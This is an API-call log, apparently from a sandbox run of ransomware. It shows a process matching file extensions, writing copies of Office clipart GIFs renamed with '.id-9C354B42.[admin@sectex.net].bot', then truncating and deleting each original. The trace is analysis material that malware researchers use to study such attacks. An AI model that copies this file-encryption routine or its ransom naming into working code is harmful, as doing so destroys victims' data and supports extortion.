	[0055.097] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.097] lstrlenW (lpString=".pdf") returned 4
	[0055.097] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.097] lstrlenW (lpString=".xls") returned 4
	[0055.097] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.097] lstrlenW (lpString=".xlsx") returned 5
	[0055.097] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.097] lstrlenW (lpString=".ppt") returned 4
	[0055.097] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.098] lstrlenW (lpString=".zip") returned 4
	[0055.098] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.098] lstrlenW (lpString=".rar") returned 4
	[0055.098] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.098] lstrlenW (lpString=".bz2") returned 4
	[0055.098] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.098] lstrlenW (lpString=".7z") returned 3
	[0055.098] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.098] lstrlenW (lpString=".dbf") returned 4
	[0055.098] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.098] lstrlenW (lpString=".1cd") returned 4
	[0055.098] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.098] lstrlenW (lpString=".jpg") returned 4
	[0055.098] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.098] lstrlenW (lpString=".doc") returned 4
	[0055.098] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.098] lstrlenW (lpString=".docx") returned 5
	[0055.098] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.098] lstrlenW (lpString=".pdf") returned 4
	[0055.098] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.098] lstrlenW (lpString=".xls") returned 4
	[0055.098] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.098] lstrlenW (lpString=".xlsx") returned 5
	[0055.098] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.098] lstrlenW (lpString=".ppt") returned 4
	[0055.098] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.098] lstrlenW (lpString=".zip") returned 4
	[0055.099] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.099] lstrlenW (lpString=".rar") returned 4
	[0055.099] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.099] lstrlenW (lpString=".bz2") returned 4
	[0055.099] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.099] lstrlenW (lpString=".7z") returned 3
	[0055.099] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.099] lstrlenW (lpString=".dbf") returned 4
	[0055.099] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.099] lstrlenW (lpString=".1cd") returned 4
	[0055.099] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.099] lstrlenW (lpString=".jpg") returned 4
	[0055.099] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.099] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.099] lstrlenW (lpString="AG00129_.GIF") returned 12
	[0055.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0055.099] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=12482) returned 1
	[0055.099] CloseHandle (hObject=0x230) returned 1
	[0055.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif")) returned 0x20
	[0055.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0055.100] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.100] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0055.100] GetLastError () returned 0x0
	[0055.100] ReadFile (in: hFile=0x230, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x30c2, lpOverlapped=0x0) returned 1
	[0055.102] WriteFile (in: hFile=0x21c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x30d0, lpOverlapped=0x0) returned 1
	[0055.104] ReadFile (in: hFile=0x230, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.104] WriteFile (in: hFile=0x21c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.104] SetEndOfFile (hFile=0x21c) returned 1
	[0055.104] CloseHandle (hObject=0x21c) returned 1
	[0055.104] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.104] SetEndOfFile (hFile=0x230) returned 1
	[0055.105] CloseHandle (hObject=0x230) returned 1
	[0055.105] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.105] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif")) returned 1
	[0055.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.106] lstrlenW (lpString=".doc") returned 4
	[0055.106] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.106] lstrlenW (lpString=".docx") returned 5
	[0055.106] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.106] lstrlenW (lpString=".pdf") returned 4
	[0055.106] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.106] lstrlenW (lpString=".xls") returned 4
	[0055.106] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.106] lstrlenW (lpString=".xlsx") returned 5
	[0055.106] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.106] lstrlenW (lpString=".ppt") returned 4
	[0055.106] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.106] lstrlenW (lpString=".zip") returned 4
	[0055.106] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.106] lstrlenW (lpString=".rar") returned 4
	[0055.106] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.106] lstrlenW (lpString=".bz2") returned 4
	[0055.106] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.106] lstrlenW (lpString=".7z") returned 3
	[0055.106] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.106] lstrlenW (lpString=".dbf") returned 4
	[0055.106] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.106] lstrlenW (lpString=".1cd") returned 4
	[0055.107] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.107] lstrlenW (lpString=".jpg") returned 4
	[0055.107] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.107] lstrlenW (lpString=".doc") returned 4
	[0055.107] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.107] lstrlenW (lpString=".docx") returned 5
	[0055.107] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.107] lstrlenW (lpString=".pdf") returned 4
	[0055.107] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.107] lstrlenW (lpString=".xls") returned 4
	[0055.107] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.107] lstrlenW (lpString=".xlsx") returned 5
	[0055.107] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.107] lstrlenW (lpString=".ppt") returned 4
	[0055.107] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.107] lstrlenW (lpString=".zip") returned 4
	[0055.107] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.107] lstrlenW (lpString=".rar") returned 4
	[0055.107] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.107] lstrlenW (lpString=".bz2") returned 4
	[0055.107] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.107] lstrlenW (lpString=".7z") returned 3
	[0055.107] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.107] lstrlenW (lpString=".dbf") returned 4
	[0055.107] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.107] lstrlenW (lpString=".1cd") returned 4
	[0055.107] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63
	[0055.108] lstrlenW (lpString=".jpg") returned 4
	[0055.108] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.108] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.108] lstrlenW (lpString="AG00130_.GIF") returned 12
	[0055.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0055.108] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=5253) returned 1
	[0055.108] CloseHandle (hObject=0x230) returned 1
	[0055.108] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif")) returned 0x20
	[0055.108] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0055.108] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.108] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0055.109] GetLastError () returned 0x0
	[0055.109] ReadFile (in: hFile=0x230, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x1485, lpOverlapped=0x0) returned 1
	[0055.110] WriteFile (in: hFile=0x21c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x1490, lpOverlapped=0x0) returned 1
	[0055.111] ReadFile (in: hFile=0x230, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.111] WriteFile (in: hFile=0x21c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.111] SetEndOfFile (hFile=0x21c) returned 1
	[0055.112] CloseHandle (hObject=0x21c) returned 1
	[0055.112] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.112] SetEndOfFile (hFile=0x230) returned 1
	[0055.112] CloseHandle (hObject=0x230) returned 1
	[0055.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.113] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif")) returned 1
	[0055.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.113] lstrlenW (lpString=".doc") returned 4
	[0055.113] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.113] lstrlenW (lpString=".docx") returned 5
	[0055.113] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.113] lstrlenW (lpString=".pdf") returned 4
	[0055.113] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.113] lstrlenW (lpString=".xls") returned 4
	[0055.113] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.113] lstrlenW (lpString=".xlsx") returned 5
	[0055.113] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.113] lstrlenW (lpString=".ppt") returned 4
	[0055.113] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.113] lstrlenW (lpString=".zip") returned 4
	[0055.113] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.113] lstrlenW (lpString=".rar") returned 4
	[0055.113] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.113] lstrlenW (lpString=".bz2") returned 4
	[0055.113] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.113] lstrlenW (lpString=".7z") returned 3
	[0055.114] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.114] lstrlenW (lpString=".dbf") returned 4
	[0055.114] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.114] lstrlenW (lpString=".1cd") returned 4
	[0055.114] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.114] lstrlenW (lpString=".jpg") returned 4
	[0055.114] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.114] lstrlenW (lpString=".doc") returned 4
	[0055.114] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.114] lstrlenW (lpString=".docx") returned 5
	[0055.114] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.114] lstrlenW (lpString=".pdf") returned 4
	[0055.114] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.114] lstrlenW (lpString=".xls") returned 4
	[0055.114] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.114] lstrlenW (lpString=".xlsx") returned 5
	[0055.114] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.114] lstrlenW (lpString=".ppt") returned 4
	[0055.114] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.114] lstrlenW (lpString=".zip") returned 4
	[0055.114] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.114] lstrlenW (lpString=".rar") returned 4
	[0055.114] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.114] lstrlenW (lpString=".bz2") returned 4
	[0055.114] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.114] lstrlenW (lpString=".7z") returned 3
	[0055.114] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.115] lstrlenW (lpString=".dbf") returned 4
	[0055.115] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.115] lstrlenW (lpString=".1cd") returned 4
	[0055.115] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63
	[0055.115] lstrlenW (lpString=".jpg") returned 4
	[0055.115] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.115] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.115] lstrlenW (lpString="AG00135_.GIF") returned 12
	[0055.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0055.116] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=2596) returned 1
	[0055.116] CloseHandle (hObject=0x21c) returned 1
	[0055.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif")) returned 0x20
	[0055.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0055.116] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.116] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0055.117] GetLastError () returned 0x0
	[0055.117] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0xa24, lpOverlapped=0x0) returned 1
	[0055.118] WriteFile (in: hFile=0x158, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xa30, lpOverlapped=0x0) returned 1
	[0055.119] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.119] WriteFile (in: hFile=0x158, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.119] SetEndOfFile (hFile=0x158) returned 1
	[0055.119] CloseHandle (hObject=0x158) returned 1
	[0055.120] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.120] SetEndOfFile (hFile=0x21c) returned 1
	[0055.120] CloseHandle (hObject=0x21c) returned 1
	[0055.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.121] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif")) returned 1
	[0055.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.121] lstrlenW (lpString=".doc") returned 4
	[0055.121] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.121] lstrlenW (lpString=".docx") returned 5
	[0055.121] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.121] lstrlenW (lpString=".pdf") returned 4
	[0055.121] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.121] lstrlenW (lpString=".xls") returned 4
	[0055.121] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.121] lstrlenW (lpString=".xlsx") returned 5
	[0055.121] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
